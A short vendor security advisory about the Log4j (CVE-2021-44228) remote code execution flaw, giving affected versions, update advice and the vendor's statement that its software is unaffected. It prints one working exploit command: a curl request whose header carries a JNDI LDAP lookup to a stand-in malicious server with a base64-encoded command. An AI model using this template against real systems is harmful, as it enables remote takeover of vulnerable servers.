Cervisys security has been tracking an evolving issue over the weekend and into the beginning of this week.
The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.
This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.
The Exploit
The most simplistic example being:
curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v
when executed this runs touch /tmp/pwned on the target system.
There are many such examples being tracked at the time of writing which seek to either exploit the issue or at the very least confirm the presence of the issue.
Is any Cervisys Software or Service Affected by this Vulnerability?
At the time of writing, no Cervisys software is known to be affected by the CVE-2021-44228 log4j vulnerability here at Cervisys at this time.
We are of course working with our service vendors and third parties to ensure they too are not affected by this issue and are tracking their response internally via the portal at the time of writing. Cervisys is not aware of any of our service providers impacted by the log4j vulnerability at the time of writing.
Where possible, we are employing methods to increase visibility, and protection against this issue regardless of the underlying software not being affected to apply additional layers of protection.
We have validated that the software we are using is not affected by this issue at the time of writing.
Please contact support at help@cervisys.com should you wish to raise a direct contact request regarding this or another issue.